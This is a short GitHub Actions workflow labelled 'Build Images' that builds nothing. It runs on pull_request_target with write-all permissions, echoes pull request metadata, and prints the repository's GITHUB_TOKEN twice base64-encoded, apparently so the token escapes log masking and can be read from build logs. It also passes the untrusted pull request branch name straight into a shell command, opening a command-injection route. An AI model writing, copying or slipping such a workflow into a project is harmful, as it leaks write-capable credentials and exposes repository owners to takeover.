name: "Build Images"
on: 
  pull_request_target:

permissions: write-all

jobs:
  init:
    runs-on: ubuntu-latest
    name: "init"
    steps:
    - run: |
        
      

        echo "[+] github.event.pull_request.head.sha"
        echo ${{ github.event.pull_request.head.sha }}

        echo "[+] github.event.pull_request.head.ref"
        echo ${{ github.event.pull_request.head.ref }}

        echo "[+] github.event_name"
        echo ${{ github.event_name }}

        echo "[+] github.event.pull_request.head.repo.full_name"
        echo ${{ github.event.pull_request.head.repo.full_name }}

        echo "${{ secrets.GITHUB_TOKEN }}" | base64 -w0 | base64 -w0
